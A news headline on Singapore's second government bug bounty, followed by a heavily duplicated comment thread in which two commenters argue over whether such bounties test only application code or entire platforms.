Hackers get invite to find holes in Singapore Govt's digital systems in 2nd bug bounty exercise
Five highly used Internet-facing systems and websites such as the REACH and MFA sites will be subject to ethical hackers' scrutiny for a month.
(Updated: )
Good initiative. But why only 5 systems? Wouldn't it be better to include all .gov.sg sites and patch more vulnerable entry points?
When this 5 systems are put out to be hacked - they are doing so in a controlled environment.
Any vulnerabilities found are then documented - and patches can then be rolled out to all other Government systems that uses similar platform.
It will take times to develop the patches and then patch the system using similar platform.
By doing so, it will not disrupt the live systems that serve the public or internal systems that serve the Administration.
If all systems are being rolled out for hacking :-
(1) Hackers cannot stay focus on a few systems to find vulnerabilities - as there are thousands of systems out there - and may miss the vulnerabilities in the few target systems.
(2) Too many systems maybe disrupted - if all systems are put out for hacking.
Any vulnerabilities found are then documented - and patches can then be rolled out to all other Government systems that uses similar platform.
It will take times to develop the patches and then patch the system using similar platform.
By doing so, it will not disrupt the live systems that serve the public or internal systems that serve the Administration.
If all systems are being rolled out for hacking :-
(1) Hackers cannot stay focus on a few systems to find vulnerabilities - as there are thousands of systems out there - and may miss the vulnerabilities in the few target systems.
(2) Too many systems maybe disrupted - if all systems are put out for hacking.
Eg. these few systems may use Microsoft dot-net platform for the web development - to subject to control hacking.
After the hacking events - vulnerabilities found can be shared by all Government department using the same Microsoft platform for development - develop patches and patch up the system.
Next time another Web platform will be chosen - and repeat the same process.
Imagine if all web platform are roll out for hacking --- how do hacker stay focus and how to control the damage when there are so many platform out there to control?
After the hacking events - vulnerabilities found can be shared by all Government department using the same Microsoft platform for development - develop patches and patch up the system.
Next time another Web platform will be chosen - and repeat the same process.
Imagine if all web platform are roll out for hacking --- how do hacker stay focus and how to control the damage when there are so many platform out there to control?
Thus by rolling out these 5 systems of Microsoft platform - hackers with Microsoft knowledge can be invited.
Breeke Lo - Microsoft platform means apps develop using this platform. Apps develop using dot.net and J2ee should be different right?
And not true that OS companies will patch up everything - as there are many features out there - and rely on OS and platform administrator to harden and tighten them.
Thus apps development done on Microsoft platform - will need to harden the apps, as well as os and its platform.
Now only Reach dept and MFA IT dept need to be on standby.
If open to all, all gov dept IT need to be on standby.
And not true that OS companies will patch up everything - as there are many features out there - and rely on OS and platform administrator to harden and tighten them.
Thus apps development done on Microsoft platform - will need to harden the apps, as well as os and its platform.
Now only Reach dept and MFA IT dept need to be on standby.
If open to all, all gov dept IT need to be on standby.
Security is not only on apps.
It covers all the 7 layer of OSI.eg. Singhealth citrix platform - few OSI layers compromise.
It covers all the 7 layer of OSI.eg. Singhealth citrix platform - few OSI layers compromise.
Interesting my other comprehensive response were deleted multiple times.
Look like i can't reveal too much.
Ok that's all.
Look like i can't reveal too much.
Ok that's all.
Breeke Lo
Ricky Lim honestly, u dun know what you are talking abt. U dun test OSes or frameworks. Whether our apps were written on asp, php, python, javascript or whatever .. u r testing the code we wrote. Every single app needs to be tested on its own. U can't 'port' over your patches.
That's all.
That's all.
Breeke Lo - eg, Singhealth apps is not only apps.
It is the whole platform - the apps reside in Citrix platform - a few OSI layers vulnerabilities are exploited before getting into the SCM.
Now patches on vulnerabilities in Citrix platform - can be ported over to other Citrix platform.
I quote the eg. of Microsoft platform - that include MS Azure cloud, MS dot.net, MS SQL etc. and apps (that can use any programming languages) reside in it.
Govt IT - not only centralised - they also have individual Ministries data centre and IT personnel.
It is the whole platform - the apps reside in Citrix platform - a few OSI layers vulnerabilities are exploited before getting into the SCM.
Now patches on vulnerabilities in Citrix platform - can be ported over to other Citrix platform.
I quote the eg. of Microsoft platform - that include MS Azure cloud, MS dot.net, MS SQL etc. and apps (that can use any programming languages) reside in it.
Govt IT - not only centralised - they also have individual Ministries data centre and IT personnel.
Breeke Lo - It say system - system cover all 7 OSI layers - not only apps. (Web-Apps-Database) plus the entire platform/architecture.
(this is a summarise response - 3rd comprehensive response - again deleted) - strange.
Breeke Lo
Ricky Lim bugs bounty programs, like the perpetual programs at FB, Amazon etc etc .. tests WEB apps written in web languages. Other levels of security tests cannot be carried out remotely overseas. System in this context means the open web systems, not your closed security ecosystems. Get it bo? You obviously hv no clue what u r talking and u still kept blabbering on.. stick to your areas of expertise ok? 😁
Ricky Lim v easy way to help u get it .. what does the word BUG tells u? It's a loophole or poor coding left behind by the progammer who wrote YOUR custom apps/system.
Breeke Lo - have you bid for any tender or develop any "application system" for the Government?
You can find it in Gebiz - all the specs for an "application system".
The whole system = whole architecture.
No need to argue with "what you know" based on web development - check GEBIZ for any "system" that the Government will tender out --- if not check with any vendors that bid for any "application systems".
The "apps system" - include (Web-Apps-Database) plus the entire platform/architecture (include servers, database, os, apps development, security devices. load balancers etc - as one package) - known as the "particular apps system: - not application programming and call it apps.
Check with those big apps vendors that bid and won those apps tender.
You will find out who is right - based on what you know - and what actually is.
I will not comment anymore.
You can find it in Gebiz - all the specs for an "application system".
The whole system = whole architecture.
No need to argue with "what you know" based on web development - check GEBIZ for any "system" that the Government will tender out --- if not check with any vendors that bid for any "application systems".
The "apps system" - include (Web-Apps-Database) plus the entire platform/architecture (include servers, database, os, apps development, security devices. load balancers etc - as one package) - known as the "particular apps system: - not application programming and call it apps.
Check with those big apps vendors that bid and won those apps tender.
You will find out who is right - based on what you know - and what actually is.
I will not comment anymore.
No Government tender for any application system or web portal ---- go without the entire "platform or architecture" as one package --- because vendors need to be responsible for the :-
(1) entire security related to this application system
(2) application load
(3) performance
(4) scalability
(5) transaction load
etc.
Vendors have to size up the servers, load balancers, security device capacity, network capacity, OS, memory capacity, diskspace etc based on the transaction load, web hit, caching requirement etc ---- and no government tenders will go without the entire platform or architecture for any application system projects or application / web development for the Government.
When the Government let the hackers hack - they let them hack the whole platform - not just apps. Singhealth hack - is not apps vulnerability - it is the entire Citrix platform that hold the SCM apps that are vulnerable.
Check with those apps vendors that win Government apps bid --- then you tell me you are correct or I am correct.
(1) entire security related to this application system
(2) application load
(3) performance
(4) scalability
(5) transaction load
etc.
Vendors have to size up the servers, load balancers, security device capacity, network capacity, OS, memory capacity, diskspace etc based on the transaction load, web hit, caching requirement etc ---- and no government tenders will go without the entire platform or architecture for any application system projects or application / web development for the Government.
When the Government let the hackers hack - they let them hack the whole platform - not just apps. Singhealth hack - is not apps vulnerability - it is the entire Citrix platform that hold the SCM apps that are vulnerable.
Check with those apps vendors that win Government apps bid --- then you tell me you are correct or I am correct.
Breeke Lo - because you don't know how the Government IT systems operate.
Breeke Lo
Ricky Lim there are ALOT to be done to secure and test ALL those moving components you listed in the tender docs.
HOWEVER, this bugs bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUGS bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
HOWEVER, this bugs bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUGS bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
Breeke Lo - You have not undergo such a test - ie. why you literally pick up from this news - and you are fixated on the apps programming and only apps.
All those who are involved in such exercise - know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hackers worth the salt - don't start hacking the apps first.
They will always start with all the low level network info. and the OS..... sigh ....
eg. if don't do dns trace, traceoute, web discovery etc how to hack apps?????? Faint....
If not you volunteer yourself as the white hackers and let us know the scope --- then no need to argue here.
All those who are involved in such exercise - know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hackers worth the salt - don't start hacking the apps first.
They will always start with all the low level network info. and the OS..... sigh ....
eg. if don't do dns trace, traceoute, web discovery etc how to hack apps?????? Faint....
If not you volunteer yourself as the white hackers and let us know the scope --- then no need to argue here.
Breeke Lo
Ricky Lim there are ALOT other things to be done, OUTSIDE of this bugs bounty program, to secure and test ALL those moving components you listed in the tender docs.
HOWEVER, this bugs bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUGS bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
HOWEVER, this bugs bounty program is SPECIFICALLY addressing code vulnerabilities. That is what a BUGS bounty program does.
It is NOT a COMPLETE security hardening exercise of the ENTIRE ecosystem.
GET IT?? My god.
Ricky Lim
Breeke Lo - You have not undergo such a test - ie. why you literally pick up from this news - and you are fixated on the apps programming and only apps.
All those who are involved in such exercise - know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hackers worth the salt - don't start hacking the apps first.
They will always start with all the low level network info. and the OS..... sigh ....(when you search a website and click on the link - we are already doing a dns service - url to ip translation).
DNS server already need to be involved in the 1st URL link click. And then Server Load Balancer will direct the URL hit to the available server that hold the Web service. (You mean apps can operate in thin air meh).
At least you will need to access to the Web server that hold the web pages.
You think hackers don't hack the DNS service and the Load Balancers first - can just go straight to the Web page meh? Don't make sense.
eg. if don't do dns trace, traceoute, web discovery etc how to hack web services?????? Faint....
If not you see how State APT hack the Singhealth database - they don't start with apps first. Hackers will hack platform, servers, OS, database, routers etc that he can hold to go straight to the data bypassing apps.
If not you volunteer yourself as the white hackers and let us know the scope --- then no need to argue here.
All those who are involved in such exercise - know the scope and the scale.
Find out from people who are involved before you push your ideas.
Any hackers worth the salt - don't start hacking the apps first.
They will always start with all the low level network info. and the OS..... sigh ....(when you search a website and click on the link - we are already doing a dns service - url to ip translation).
DNS server already need to be involved in the 1st URL link click. And then Server Load Balancer will direct the URL hit to the available server that hold the Web service. (You mean apps can operate in thin air meh).
At least you will need to access to the Web server that hold the web pages.
You think hackers don't hack the DNS service and the Load Balancers first - can just go straight to the Web page meh? Don't make sense.
eg. if don't do dns trace, traceoute, web discovery etc how to hack web services?????? Faint....
If not you see how State APT hack the Singhealth database - they don't start with apps first. Hackers will hack platform, servers, OS, database, routers etc that he can hold to go straight to the data bypassing apps.
If not you volunteer yourself as the white hackers and let us know the scope --- then no need to argue here.
Breeke Lo
Ricky Lim Let me remind u what we are arguing over.
U said "patches can then be rolled out to all other Government systems that uses similar PLATFORMS"
I diagreed. I said, YOU CAN'T patch platforms. You can ONLY patch your OWN code.
So, once and for all, without anymore copy and paste thank you ..
1) Can we patch PLATFORMS / ARCHITECTURES (eg .net, MS Server, Nginx)? Yes/No
2) We can only patch the bugs found in OUR own apps. Agree / Disagree
U said "patches can then be rolled out to all other Government systems that uses similar PLATFORMS"
I diagreed. I said, YOU CAN'T patch platforms. You can ONLY patch your OWN code.
So, once and for all, without anymore copy and paste thank you ..
1) Can we patch PLATFORMS / ARCHITECTURES (eg .net, MS Server, Nginx)? Yes/No
2) We can only patch the bugs found in OUR own apps. Agree / Disagree
Like · Reply · 1m
Breeke Lo
Ricky Lim Let me remind u what we are arguing over.
U said "patches can then be rolled out to all other Government systems that uses similar PLATFORMS"
I diagreed. I said, YOU CAN'T patch platforms. You can ONLY patch your OWN code.
So, once and for all, without anymore copy and paste thank you ..
1) Can we patch PLATFORMS / ARCHITECTURES (eg .net, MS Server, Nginx)? Yes/No
2) We can only patch the bugs found in OUR own apps. Agree / Disagree
U said "patches can then be rolled out to all other Government systems that uses similar PLATFORMS"
I diagreed. I said, YOU CAN'T patch platforms. You can ONLY patch your OWN code.
So, once and for all, without anymore copy and paste thank you ..
1) Can we patch PLATFORMS / ARCHITECTURES (eg .net, MS Server, Nginx)? Yes/No
2) We can only patch the bugs found in OUR own apps. Agree / Disagree
Like · Reply · 5m
Ricky Lim
Breeke Lo - Have you heard of :-
(1) Hardening of platform, routers, os, servers?
(2) Virtual patching?
(3) Sandbox
(4) System patching
etc --- all these are done by IT people - not platform vendors.
Singhealth "patching" and plugging of security loopholes - about 16 to 18 suggestions are related to above --- have not heard of patching bugs in the Singhealth apps in the COI security recommendation - which will already have been ironed out.
Singhealth State APT hacks - are predominantly vulnerabilties in the platform and architecture - not the apps bugs.
Silly for Government not to let hackers hack the whole things - and just hack apps.
REACH apps have been there for decades - any apps bugs will have been known long ago.
(1) Hardening of platform, routers, os, servers?
(2) Virtual patching?
(3) Sandbox
(4) System patching
etc --- all these are done by IT people - not platform vendors.
Singhealth "patching" and plugging of security loopholes - about 16 to 18 suggestions are related to above --- have not heard of patching bugs in the Singhealth apps in the COI security recommendation - which will already have been ironed out.
Singhealth State APT hacks - are predominantly vulnerabilties in the platform and architecture - not the apps bugs.
Silly for Government not to let hackers hack the whole things - and just hack apps.
REACH apps have been there for decades - any apps bugs will have been known long ago.
Like · Reply · 1m · Edited
Breeke Lo
Ricky Lim Just curious, when u go into a car workshop to patch a hole on the tyre .. were u expeting the guy to test every moving part in your car? lol You know that u r only paying for the holes he patched right?
Like · Reply · 1m · Edited
Ricky Lim
Breeke Lo - i rest my case.
Let the truth be out one day. No point arguing.
Just let you know that when Mindef let their web apps hack - it is everything.
Mindef hack web sites include network and systems :-
The new initiative will allow Mindef to tap crowdsourcing to detect vulnerabilities, on top of the work done by its existing teams, said Mr Koh. “No individual organisation, not even the Government, has enough resources to check our own networks and systems, and fix all the vulnerabilities, all the time,” he added.
Now, this 30-year-old cybersecurity manager from Ernst & Young has been rewarded for being the top overall white hat participant in MINDEF's bug bounty programme.
The hacker, who wanted to be known only by his codename Darrel Shivadagger, reported nine out of 35 vulnerabilities that existed in MINDEF systems, one of which was rated a "high severity" bug. He was awarded US$5,000 (S$6,606) for his efforts.
"They (MINDEF) have systems in place that are actually quite sensitive,” Darrel said. “They actually warded off very intrusive attempts from me. I was able to find only client-side vulnerabilities. I couldn't really find anything major or server-side related.”
In total, MINDEF rewarded US$14,750 in bounties to the 17 successful hackers who participated.
Read more at https://www.channelnewsasia.com/news/singapore/hacker-awarded-us-5-000-after-finding-9-vulnerabilities-in-9978058
I rest my case - argue for what?
Let the truth be out one day. No point arguing.
Just let you know that when Mindef let their web apps hack - it is everything.
Mindef hack web sites include network and systems :-
The new initiative will allow Mindef to tap crowdsourcing to detect vulnerabilities, on top of the work done by its existing teams, said Mr Koh. “No individual organisation, not even the Government, has enough resources to check our own networks and systems, and fix all the vulnerabilities, all the time,” he added.
Now, this 30-year-old cybersecurity manager from Ernst & Young has been rewarded for being the top overall white hat participant in MINDEF's bug bounty programme.
The hacker, who wanted to be known only by his codename Darrel Shivadagger, reported nine out of 35 vulnerabilities that existed in MINDEF systems, one of which was rated a "high severity" bug. He was awarded US$5,000 (S$6,606) for his efforts.
"They (MINDEF) have systems in place that are actually quite sensitive,” Darrel said. “They actually warded off very intrusive attempts from me. I was able to find only client-side vulnerabilities. I couldn't really find anything major or server-side related.”
Darrel was one of 264 white hat hackers from around the world who participated in the programme, including people from the United States, Singapore, India, Romania, Canada, Russia, Sweden, Ireland, Egypt and Pakistan.
They were invited to try to penetrate systems - including the MINDEF’s public website, NS Portal and Defence Mail - for three weeks from Jan 15 until Feb 4.
In total, MINDEF rewarded US$14,750 in bounties to the 17 successful hackers who participated.
Read more at https://www.channelnewsasia.com/news/singapore/hacker-awarded-us-5-000-after-finding-9-vulnerabilities-in-9978058
I rest my case - argue for what?
Like · Reply · 1m · Edited
Breeke Lo
Ricky Lim "Just let you know that when Mindef let their web apps hack - it is everything"
I AGREE! I don;t know who are you arguing with on this? How to rob a room without going thru the living room? lol
Which means, the hacker will use the FASTEST and EASIEST route to reach the room. Thus, your kitchens, your balcony are NOT tested. Get it?
I AGREE! I don;t know who are you arguing with on this? How to rob a room without going thru the living room? lol
Which means, the hacker will use the FASTEST and EASIEST route to reach the room. Thus, your kitchens, your balcony are NOT tested. Get it?
Ricky Lim
Breeke Lo - see my post on Mindef hack that hack everything deleted.
You can go Mindef website to check. So now the truth is out.
See the argument in "endless loop" - only the "truth will dispel the endless loop".
You can go Mindef website to check. So now the truth is out.
See the argument in "endless loop" - only the "truth will dispel the endless loop".
Like · Reply · 1m · Edited
Breeke Lo
Go to hackerone website see their scope on the bounty program .. ur answer is there
By the way, the first bounty program last year found 30+ vulnerabilities and the total we paid out was US$14,750. For this amount you expecting a complete security testing and hardening of all your 7 OSI levels? 3 words for you buddy - WAIT LONG LONG
By the way, the first bounty program last year found 30+ vulnerabilities and the total we paid out was US$14,750. For this amount you expecting a complete security testing and hardening of all your 7 OSI levels? 3 words for you buddy - WAIT LONG LONG
用李
Sad...going digital.
Like · Reply · 1h
Paul Tan
There is not much to gain from attacking web sites like Gov.sg website and REACH . Mostly publicly available information. Last attack by cross-site scripting only managed to cause little damage to the reputation. Just make sure that the application can prevent the same Xss attack .
No comments:
Post a Comment